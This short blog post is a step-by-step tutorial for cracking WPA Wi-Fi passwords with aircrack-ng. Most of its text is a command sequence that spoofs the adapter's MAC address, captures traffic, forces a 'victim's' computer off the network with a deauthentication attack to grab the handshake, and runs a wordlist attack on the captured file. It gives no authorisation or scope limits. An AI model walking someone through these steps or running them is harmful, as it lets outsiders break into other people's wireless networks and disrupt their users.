What you need
- Backtrack (or Linux with aircrack-ng installed)
- Virtual machine (e.g. Vmware or Virtualbox)
- Password list
- USB Wifi adapter capable of promiscuous mode: Alfa AWUS036H
Alright, fire up the terminal.
Commands
- airmon-ng
- airmon-ng start wlan0
- ifconfig mon0 down
- macchanger -m 00:11:22:33:44:55 mon0
- ifconfig mon0 up
- airodump-ng mon0 (let it scan for a minute)
- CTRL + C (stop)
- airodump-ng -c (channel) -w (filename. eg. wpa) —bssid (xx:xx:xx:xx:xx:xx) mon0
Now, we need to deauthenticate a user's pc currently on the network (mac)
- open another console
- aireplay-ng --deauth 1 (just one!) -e (ESSID) -c (victim's mac) mon0
- Wait for WPA handshake ==> airodump-ng
- —-all cracking can be done offline—-
- aircrack-ng -w (wordlist) file (eg. WPA-01.cap)
- this is the file from step 8
Video
Any problems? Ask!
No comments:
Post a Comment